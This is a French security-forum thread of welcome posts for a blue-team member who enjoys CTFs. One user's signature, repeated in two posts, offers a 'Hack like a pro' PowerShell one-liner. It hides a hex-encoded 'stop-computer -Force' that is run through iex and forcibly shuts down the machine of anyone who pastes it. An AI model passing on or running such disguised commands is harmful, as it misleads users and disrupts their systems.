Annonce

Réduire
Aucune annonce.

C'est mon tour.

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • C'est mon tour.

    Bonjour,
    Je me présente Mendeleïev, ce nom doit rappeler de mauvais souvenirs à certains d'entre vous ou peut être des phrases mnémotechniques pour d'autres.

    Je suis un vieux monsieur comparé à la majorité d'entre vous, mais j'ai eu une vie très riche professionnellement parlant qui m'a menée vers la sécurité informatique.

    Je traîne sur le forum depuis des lustres en tant qu'invité, mais le ton général et les interventions pertinentes m'ont fait franchir le cap de l'inscription.

    Je suis là pour découvrir de nouvelles choses, expérimenter des ruses de sioux et rencontrer des passionnés.
    Je passe mon temps à monter des VM et à les triturer dans tous les sens pour finir par faire "Wahou mais ca marche vraiment ! ", "Scrongneu gneu je vais devoir encore publier du KB en masse"

    Au plaisir d'échanger avec vous.



  • #2
    Bienvenue à toi l'ami, à plus tard sur le forum
    N'hésites pas à demander de l'aide !

    Commentaire


    • #3
      Salut,

      La classification périodique des éléments ne me rappelle rien de déplaisant. Elle fait partie intégrante de mon quotidien professionnel.

      Content que tu aies franchi le pas de l'inscription et surtout de la présentation. Ce sont les messages en général qui font vivre le forum, que ce soient des questions, des réponses ou autres.

      Soit le bienvenu.

      Commentaire


      • #4
        bienvenue.png
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Bonjour !

          Mendeleïev, c'est le truc avec les petits pois ? Ou alors, je confonds...

          Bienvenu ici et merci pour la présentation !

          Commentaire


          • #6
            Bonjour et bienvenue !

            Commentaire


            • #7
              Bienvenue !

              Commentaire


              • #8
                Merci pour l'accueil,
                je précise que je suis très curieux de nature et comme saint Thomas je ne crois que ce que je vois.

                dans mon boulot je suis dans l'équipe des bleus contre les reds lors des challenges, je suis donc obligé de me tenir au courant d'un maximum de stratagème pour trouver des parades ...

                la connaissance est la clef lors des mises sous pression et ici au gré des lectures je trouve plein de choses interessantes !

                fan de CTF j'essaye de participer quant il me reste un peu de temps !

                [edit] fautes de frappe

                Dernière modification par Mendeleiev, 30 juillet 2018, 21h55.

                Commentaire


                • #9
                  Vive les bleus
                  Hey, n'hésite pas à faire signe / ouvrir un sujet quand tu te lances sur un CTF online
                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire


                  • #10
                    Salut...

                    Commentaire


                    • #11
                      Je suis novice et bien envie de discuter si cela vous dit...

                      Commentaire


                      • #12
                        Envoyé par Icarus Voir le message
                        Salut,

                        La classification périodique des éléments ne me rappelle rien de déplaisant. Elle fait partie intégrante de mon quotidien professionnel.

                        Content que tu aies franchi le pas de l'inscription et surtout de la présentation. Ce sont les messages en général qui font vivre le forum, que ce soient des questions, des réponses ou autres.

                        Soit le bienvenu.
                        Quelle chance ! C'était ma bête noire quand nous étions au collège.
                        Dernière modification par Overflow, 19 février 2019, 15h40.

                        Commentaire

                        Chargement...
                        X